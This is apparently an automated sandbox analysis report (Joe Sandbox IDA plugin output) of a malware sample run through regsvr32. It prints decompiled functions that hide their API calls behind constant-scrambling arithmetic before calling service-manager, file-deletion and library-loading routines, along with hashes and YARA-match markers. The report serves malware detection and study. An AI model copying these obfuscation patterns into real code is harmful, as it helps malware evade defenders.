                                                                                                                0x1002d30f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002d30f
                                                                                                                0x1002d2e6
                                                                                                                0x1002d2e6
                                                                                                                0x1002d2e6
                                                                                                                0x1002d2ed
                                                                                                                0x1002d3ab
                                                                                                                0x1002d3ab
                                                                                                                0x1002d3ae
                                                                                                                0x1002d3b0
                                                                                                                0x1002d3b3
                                                                                                                0x1002d3b3
                                                                                                                0x1002d3b6
                                                                                                                0x1002d3c0
                                                                                                                0x1002d3c3
                                                                                                                0x1002d3c6
                                                                                                                0x1002d3c9
                                                                                                                0x1002d3d6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002d2ed

                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(10070CE8,?,?,?,00000000,10070CCC,1002D6F0,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D2D6
                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,00000000,10070CCC,1002D6F0,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D32C
                                                                                                                • GlobalHandle.KERNEL32(00650CF0), ref: 1002D335
                                                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,00000000,10070CCC,1002D6F0,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D33E
                                                                                                                • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 1002D355
                                                                                                                • GlobalHandle.KERNEL32(00650CF0), ref: 1002D367
                                                                                                                • GlobalLock.KERNEL32 ref: 1002D36E
                                                                                                                • LeaveCriticalSection.KERNEL32(DF7C0CDA,?,?,?,00000000,10070CCC,1002D6F0,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D378
                                                                                                                • GlobalLock.KERNEL32 ref: 1002D384
                                                                                                                • _memset.LIBCMT ref: 1002D39D
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 1002D3C9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 496899490-0
                                                                                                                • Opcode ID: aeea9eab5cc247d157816f8e8e02fc752110606d52bd9f5e1aef31689bbfc51c
                                                                                                                • Instruction ID: 761ca4e0501a4ea6bbffea5edcf62f63010a77a36e96150a68e1b316e6682d99
                                                                                                                • Opcode Fuzzy Hash: aeea9eab5cc247d157816f8e8e02fc752110606d52bd9f5e1aef31689bbfc51c
                                                                                                                • Instruction Fuzzy Hash: 6531BC71604B019FE720DF34EC88A2AB7E8FB48345B01492EF496C3651EB70FD448B61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003B59D Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                C-Code - Quality: 39%
                                                                                                                			E1003B59D(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x10068ab8);
				_t8 = E1003D578(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E1003D5BD(_t8);
				}
				if( *0x10072bec != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x10071464, 0, ??); // executed
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E1003D47E(_t31);
						 *_t10 = E1003D443(GetLastError());
					}
					goto L9;
				}
				E1004329E(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E10043317(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E10043342();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E1003B5F3();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}







                                                                                                                0x1003b59d
                                                                                                                0x1003b59f
                                                                                                                0x1003b5a4
                                                                                                                0x1003b5a9
                                                                                                                0x1003b5ae
                                                                                                                0x1003b625
                                                                                                                0x1003b62a
                                                                                                                0x1003b62a
                                                                                                                0x1003b5b7
                                                                                                                0x1003b5fc
                                                                                                                0x1003b5fd
                                                                                                                0x1003b605
                                                                                                                0x1003b60b
                                                                                                                0x1003b60d
                                                                                                                0x1003b60f
                                                                                                                0x1003b622
                                                                                                                0x1003b624
                                                                                                                0x00000000
                                                                                                                0x1003b60d
                                                                                                                0x1003b5bb
                                                                                                                0x1003b5c1
                                                                                                                0x1003b5c6
                                                                                                                0x1003b5cc
                                                                                                                0x1003b5d1
                                                                                                                0x1003b5d3
                                                                                                                0x1003b5d4
                                                                                                                0x1003b5d5
                                                                                                                0x1003b5db
                                                                                                                0x1003b5dc
                                                                                                                0x1003b5e3
                                                                                                                0x1003b5ec
                                                                                                                0x00000000
                                                                                                                0x1003b5ee
                                                                                                                0x1003b5ee
                                                                                                                0x00000000
                                                                                                                0x1003b5ee

                                                                                                                APIs
                                                                                                                • __lock.LIBCMT ref: 1003B5BB
                                                                                                                  • Part of subcall function 1004329E: __mtinitlocknum.LIBCMT ref: 100432B2
                                                                                                                  • Part of subcall function 1004329E: __amsg_exit.LIBCMT ref: 100432BE
                                                                                                                  • Part of subcall function 1004329E: EnterCriticalSection.KERNEL32(00000001,00000001,?,10042BBE,0000000D,10068FA0,00000008,10042CB0,00000001,?,?,00000001,?,?,1003D112,00000001), ref: 100432C6
                                                                                                                • ___sbh_find_block.LIBCMT ref: 1003B5C6
                                                                                                                • ___sbh_free_block.LIBCMT ref: 1003B5D5
                                                                                                                • HeapFree.KERNEL32(00000000,?,10068AB8), ref: 1003B605
                                                                                                                • GetLastError.KERNEL32(?,10046716,?,00000001,00000001,10043228,00000018,10069028,0000000C,100432B7,00000001,00000001,?,10042BBE,0000000D,10068FA0), ref: 1003B616
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                • String ID:
                                                                                                                • API String ID: 2714421763-0
                                                                                                                • Opcode ID: b057a3744f8db35e1066a54d81b6712919a5241f1c533559a0aa8e4d804d16a7
                                                                                                                • Instruction ID: 32bccb91ecc65f379c8e8bfb99ac41ad4481c79a2836a02fe5f61fde7100fd86
                                                                                                                • Opcode Fuzzy Hash: b057a3744f8db35e1066a54d81b6712919a5241f1c533559a0aa8e4d804d16a7
                                                                                                                • Instruction Fuzzy Hash: 4501A775C05A129EEB22EF719C0A75E3BA4DF0035AF204119F500AE092DF38A6408B54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A6E01 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 638 1a6e01-1a6eb3 call 1ac98a call 1a7f78 OpenSCManagerW
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E001A6E01(void* __ecx, void* __edx, intOrPtr _a8, int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				short* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t36;
				void* _t46;
				signed int _t48;
				signed int _t49;

				_push(0);
				_push(_a12);
				_push(_a8);
				_push(0);
				E001AC98A(_t36);
				_v32 = 0x5e4691;
				_v28 = 0xb22c2d;
				_v24 = 0xd08f35;
				_v20 = 0;
				_v16 = 0x466167;
				_t48 = 0x37;
				_v16 = _v16 / _t48;
				_v16 = _v16 ^ 0x000b48c4;
				_v8 = 0x78b9b;
				_t49 = 0x12;
				_v8 = _v8 / _t49;
				_v8 = _v8 + 0x94cf;
				_v8 = _v8 ^ 0x0006a86d;
				_v12 = 0x7d284b;
				_v12 = _v12 + 0xfffff9ba;
				_v12 = _v12 ^ 0x007a5aaa;
				E001A7F78(_t49, 0x616ae4, _t49, 0x10d, _t49, 0x2c4dea6c);
				_t46 = OpenSCManagerW(0, 0, _a12); // executed
				return _t46;
			}














                                                                                                                0x001a6e0a
                                                                                                                0x001a6e0b
                                                                                                                0x001a6e0e
                                                                                                                0x001a6e11
                                                                                                                0x001a6e14
                                                                                                                0x001a6e1c
                                                                                                                0x001a6e23
                                                                                                                0x001a6e2c
                                                                                                                0x001a6e33
                                                                                                                0x001a6e36
                                                                                                                0x001a6e42
                                                                                                                0x001a6e47
                                                                                                                0x001a6e4c
                                                                                                                0x001a6e53
                                                                                                                0x001a6e5d
                                                                                                                0x001a6e65
                                                                                                                0x001a6e6d
                                                                                                                0x001a6e74
                                                                                                                0x001a6e7b
                                                                                                                0x001a6e82
                                                                                                                0x001a6e89
                                                                                                                0x001a6ea0
                                                                                                                0x001a6ead
                                                                                                                0x001a6eb3

                                                                                                                APIs
                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 001A6EAD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ManagerOpen
                                                                                                                • String ID: K(}$gaF$ja
                                                                                                                • API String ID: 1889721586-538739611
                                                                                                                • Opcode ID: 2bfe91f83e54762a76626f5005161e2236a064a7b9ce61c9eebc5f4be2cd1f3e
                                                                                                                • Instruction ID: 60dd5b743b37a7433b2d4c2742a47ef430e22c869c3f6693daeb4965191a6fb5
                                                                                                                • Opcode Fuzzy Hash: 2bfe91f83e54762a76626f5005161e2236a064a7b9ce61c9eebc5f4be2cd1f3e
                                                                                                                • Instruction Fuzzy Hash: B71143B2E01218BBDB04DFA5C8498DEBFB6EB46314F108189EA18A6241D7B55B259B90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A8E38 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50serviceCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 73%
                                                                                                                			E001A8E38(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t37;
				void* _t46;
				signed int _t48;
				int _t53;

				_push(_a16);
				_t53 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001AC98A(_t37);
				_v12 = 0x1c994a;
				_v12 = _v12 << 3;
				_v12 = _v12 + 0xffff2161;
				_v12 = _v12 | 0xd2ae04c7;
				_v12 = _v12 ^ 0xd2e10dca;
				_v8 = 0x3225a3;
				_v8 = _v8 + 0xb485;
				_t48 = 0x24;
				_v8 = _v8 / _t48;
				_v8 = _v8 + 0x1169;
				_v8 = _v8 ^ 0x000adbd5;
				_v16 = 0x918fbd;
				_v16 = _v16 * 0x4a;
				_v16 = _v16 ^ 0x2a1cf10f;
				E001A7F78(_t48, 0x616ae4, _t48, 0xe4, _t48, 0x7315a644);
				_t46 = OpenServiceW(_a16, _a12, _t53); // executed
				return _t46;
			}










                                                                                                                0x001a8e3f
                                                                                                                0x001a8e42
                                                                                                                0x001a8e44
                                                                                                                0x001a8e47
                                                                                                                0x001a8e4a
                                                                                                                0x001a8e4e
                                                                                                                0x001a8e4f
                                                                                                                0x001a8e54
                                                                                                                0x001a8e5e
                                                                                                                0x001a8e64
                                                                                                                0x001a8e6b
                                                                                                                0x001a8e72
                                                                                                                0x001a8e79
                                                                                                                0x001a8e80
                                                                                                                0x001a8e8c
                                                                                                                0x001a8e94
                                                                                                                0x001a8e9c
                                                                                                                0x001a8ea3
                                                                                                                0x001a8eaa
                                                                                                                0x001a8ebc
                                                                                                                0x001a8ebf
                                                                                                                0x001a8ecf
                                                                                                                0x001a8ede
                                                                                                                0x001a8ee4

                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 001A8EDE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: OpenService
                                                                                                                • String ID: ja
                                                                                                                • API String ID: 3098006287-1100367487
                                                                                                                • Opcode ID: 26f022fb4ad9c5f77b79696659ed6dd336b5c8a1a307204dd2595fd88902adc4
                                                                                                                • Instruction ID: e5da8cb76e651f3fe2617a270b6a9b6645af16422fed55b6733eb7e6f48fb486
                                                                                                                • Opcode Fuzzy Hash: 26f022fb4ad9c5f77b79696659ed6dd336b5c8a1a307204dd2595fd88902adc4
                                                                                                                • Instruction Fuzzy Hash: 05112271E01208FFEF05DFA4DA4A8DEBFB6EB15314F10C089E914A6250E7B55B209F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A7BC6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E001A7BC6(void* __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t42;
				int _t52;
				signed int _t54;
				signed int _t55;

				_push(_a4);
				E001AC98A(_t42);
				_v24 = _v24 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v28 = 0xa8f244;
				_v16 = 0x845cf1;
				_t54 = 0x49;
				_v16 = _v16 / _t54;
				_v16 = _v16 | 0x150b5070;
				_v16 = _v16 ^ 0x15045549;
				_v12 = 0xcbfb15;
				_v12 = _v12 ^ 0x1a866322;
				_v12 = _v12 + 0xffff3502;
				_v12 = _v12 ^ 0x1a48e6f8;
				_v8 = 0xe2385a;
				_v8 = _v8 | 0xfdf9d9f4;
				_t55 = 0x6e;
				_v8 = _v8 / _t55;
				_v8 = _v8 + 0xffffa480;
				_v8 = _v8 ^ 0x02430dde;
				E001A7F78(_t55, 0xbd3f148a, _t55, 0x1c4, _t55, 0x5b4e8958);
				_t52 = DeleteFileW(_a4); // executed
				return _t52;
			}













                                                                                                                0x001a7bcc
                                                                                                                0x001a7bd1
                                                                                                                0x001a7bd6
                                                                                                                0x001a7bdd
                                                                                                                0x001a7be3
                                                                                                                0x001a7bea
                                                                                                                0x001a7bf6
                                                                                                                0x001a7bfb
                                                                                                                0x001a7c00
                                                                                                                0x001a7c07
                                                                                                                0x001a7c0e
                                                                                                                0x001a7c15
                                                                                                                0x001a7c1c
                                                                                                                0x001a7c23
                                                                                                                0x001a7c2a
                                                                                                                0x001a7c31
                                                                                                                0x001a7c3b
                                                                                                                0x001a7c43
                                                                                                                0x001a7c4b
                                                                                                                0x001a7c52
                                                                                                                0x001a7c69
                                                                                                                0x001a7c74
                                                                                                                0x001a7c79

                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(1A48E6F8), ref: 001A7C74
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID: Z8
                                                                                                                • API String ID: 4033686569-4113373922
                                                                                                                • Opcode ID: 308f64f918a83fe14fd2a0715591c9d5f769be9384a043c1aa0fb948248b5d4f
                                                                                                                • Instruction ID: 7f9f00bf983e78cfb7fb2c27a3f395233f6db15e851bef3bdcb1bc30f8a1348c
                                                                                                                • Opcode Fuzzy Hash: 308f64f918a83fe14fd2a0715591c9d5f769be9384a043c1aa0fb948248b5d4f
                                                                                                                • Instruction Fuzzy Hash: 83116AB5D0024CFFDB08DFE9E94AA9EBBB1EB50304F208198E814B7290D7B65B548F50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001BED7B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48serviceCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E001BED7B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t33;
				int _t43;
				signed int _t45;
				signed int _t46;
				void* _t53;

				_push(_a8);
				_t53 = __ecx;
				_push(_a4);
				_push(__ecx);
				E001AC98A(_t33);
				_v16 = 0xcf28aa;
				_v16 = _v16 + 0xffff6a13;
				_v16 = _v16 ^ 0x00c8c4e4;
				_v12 = 0x49ff01;
				_t45 = 0xb;
				_v12 = _v12 / _t45;
				_t46 = 0x5d;
				_v12 = _v12 / _t46;
				_v12 = _v12 ^ 0x00001054;
				_v8 = 0x2a1e4a;
				_v8 = _v8 | 0x32e5c17e;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x00072801;
				E001A7F78(_t46, 0x616ae4, _t46, 0x1ec, _t46, 0x378734d);
				_t43 = CloseServiceHandle(_t53); // executed
				return _t43;
			}











                                                                                                                0x001bed82
                                                                                                                0x001bed85
                                                                                                                0x001bed87
                                                                                                                0x001bed8b
                                                                                                                0x001bed8c
                                                                                                                0x001bed91
                                                                                                                0x001bed9b
                                                                                                                0x001beda4
                                                                                                                0x001bedab
                                                                                                                0x001bedb7
                                                                                                                0x001bedbc
                                                                                                                0x001bedc4
                                                                                                                0x001bedcc
                                                                                                                0x001bedd4
                                                                                                                0x001beddb
                                                                                                                0x001bede2
                                                                                                                0x001bede9
                                                                                                                0x001beded
                                                                                                                0x001bee04
                                                                                                                0x001bee0d
                                                                                                                0x001bee13

                                                                                                                APIs
                                                                                                                • CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 001BEE0D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleService
                                                                                                                • String ID: ja
                                                                                                                • API String ID: 1725840886-1100367487
                                                                                                                • Opcode ID: bd4baa143e4bbac4393e19cbb486165dce33cce1ded8bef3e0e8cbd8b074dfa4
                                                                                                                • Instruction ID: 467aab36b567607db660fecb58586b45a3acf0600babdf81dfddf171e641b934
                                                                                                                • Opcode Fuzzy Hash: bd4baa143e4bbac4393e19cbb486165dce33cce1ded8bef3e0e8cbd8b074dfa4
                                                                                                                • Instruction Fuzzy Hash: 44013975E00208BFDB08DFA4C94A8DEBFB5EF55314F10C08AE914A6241E7B25B558F80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A4A9D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E001A4A9D(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t32;
				struct HINSTANCE__* _t39;
				WCHAR* _t43;

				_push(_a8);
				_t43 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AC98A(_t32);
				_v24 = _v24 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v28 = 0x1178a2;
				_v16 = 0x17846b;
				_v16 = _v16 | 0x3185073b;
				_v16 = _v16 + 0xffff538e;
				_v16 = _v16 ^ 0x3197b69f;
				_v12 = 0x16ba99;
				_v12 = _v12 ^ 0x02625a09;
				_v12 = _v12 ^ 0x25365766;
				_v12 = _v12 ^ 0x27431ab3;
				_v8 = 0xb183e3;
				_v8 = _v8 * 0x28;
				_v8 = _v8 | 0x77f20d23;
				_v8 = _v8 ^ 0x7ff151f0;
				E001A7F78(__ecx, 0xbd3f148a, __ecx, 0x32, __ecx, 0xc1451b2a);
				_t39 = LoadLibraryW(_t43); // executed
				return _t39;
			}












                                                                                                                0x001a4aa4
                                                                                                                0x001a4aa7
                                                                                                                0x001a4aa9
                                                                                                                0x001a4aac
                                                                                                                0x001a4aad
                                                                                                                0x001a4aae
                                                                                                                0x001a4ab3
                                                                                                                0x001a4aba
                                                                                                                0x001a4ac3
                                                                                                                0x001a4aca
                                                                                                                0x001a4ad1
                                                                                                                0x001a4ad8
                                                                                                                0x001a4adf
                                                                                                                0x001a4ae6
                                                                                                                0x001a4aed
                                                                                                                0x001a4af4
                                                                                                                0x001a4afb
                                                                                                                0x001a4b02
                                                                                                                0x001a4b16
                                                                                                                0x001a4b19
                                                                                                                0x001a4b20
                                                                                                                0x001a4b30
                                                                                                                0x001a4b39
                                                                                                                0x001a4b3f

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID: fW6%
                                                                                                                • API String ID: 1029625771-2497841860
                                                                                                                • Opcode ID: 394d79df2e022e3103ed5dfbf4f970570035fa9306bbb3e241013eecdf3199c8
                                                                                                                • Instruction ID: 32dc7dc0c414cb019af6ec7328a540d4dc55af6d0d4105a5f4263958a59885b6
                                                                                                                • Opcode Fuzzy Hash: 394d79df2e022e3103ed5dfbf4f970570035fa9306bbb3e241013eecdf3199c8
                                                                                                                • Instruction Fuzzy Hash: 23114871C11208FFCB08DFA4DA469DEBBB4EB10315F20C188E415B6251D3704B148F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B7B25 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E001B7B25() {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _t31;

				_v16 = 0x340970;
				_t2 =  &_v16; // 0x340970
				_t31 = 0x26;
				_v16 =  *_t2 / _t31;
				_v16 = _v16 ^ 0x000e30ec;
				_v8 = 0x85299d;
				_v8 = _v8 + 0xa54a;
				_v8 = _v8 ^ 0x35a74c3e;
				_v8 = _v8 ^ 0x3521895a;
				_v12 = 0xcc7db5;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x000f948d;
				E001A7F78(_t31, 0xbd3f148a, _t31, 0x108, _t31, 0xac0441b9);
				ExitProcess(0);
			}







                                                                                                                0x001b7b2b
                                                                                                                0x001b7b34
                                                                                                                0x001b7b39
                                                                                                                0x001b7b41
                                                                                                                0x001b7b49
                                                                                                                0x001b7b50
                                                                                                                0x001b7b57
                                                                                                                0x001b7b5e
                                                                                                                0x001b7b65
                                                                                                                0x001b7b6c
                                                                                                                0x001b7b73
                                                                                                                0x001b7b77
                                                                                                                0x001b7b8e
                                                                                                                0x001b7b98

                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 001B7B98
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID: p4
                                                                                                                • API String ID: 621844428-1539767998
                                                                                                                • Opcode ID: 94c440c38613cd405a4d170ca76893493cc6bc59e85da6168acdace7e4be3644
                                                                                                                • Instruction ID: 0615ec895042f37744e5d3fc6fe8feba5dd620595baeb5bb8ffc61641f8f77ea
                                                                                                                • Opcode Fuzzy Hash: 94c440c38613cd405a4d170ca76893493cc6bc59e85da6168acdace7e4be3644
                                                                                                                • Instruction Fuzzy Hash: 96F08C71E0030CFBDB44DBE5D94AA9EBBF0EB50304F20C088D915A7241D7B56B088F41
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10043E29 Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10043E29(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x10071464 = _t6;
				if(_t6 != 0) {
					_t7 = E10043DCE(__eflags);
					__eflags = _t7 - 3;
					 *0x10072bec = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E100432CF(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x10071464);
							 *0x10071464 =  *0x10071464 & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}






                                                                                                                0x10043e3a
                                                                                                                0x10043e42
                                                                                                                0x10043e47
                                                                                                                0x10043e4c
                                                                                                                0x10043e51
                                                                                                                0x10043e54
                                                                                                                0x10043e59
                                                                                                                0x10043e7f
                                                                                                                0x10043e81
                                                                                                                0x10043e82
                                                                                                                0x10043e5b
                                                                                                                0x10043e60
                                                                                                                0x10043e65
                                                                                                                0x10043e68
                                                                                                                0x00000000
                                                                                                                0x10043e6a
                                                                                                                0x10043e70
                                                                                                                0x10043e76
                                                                                                                0x00000000
                                                                                                                0x10043e76
                                                                                                                0x10043e68
                                                                                                                0x10043e49
                                                                                                                0x10043e49
                                                                                                                0x10043e4b
                                                                                                                0x10043e4b

                                                                                                                APIs
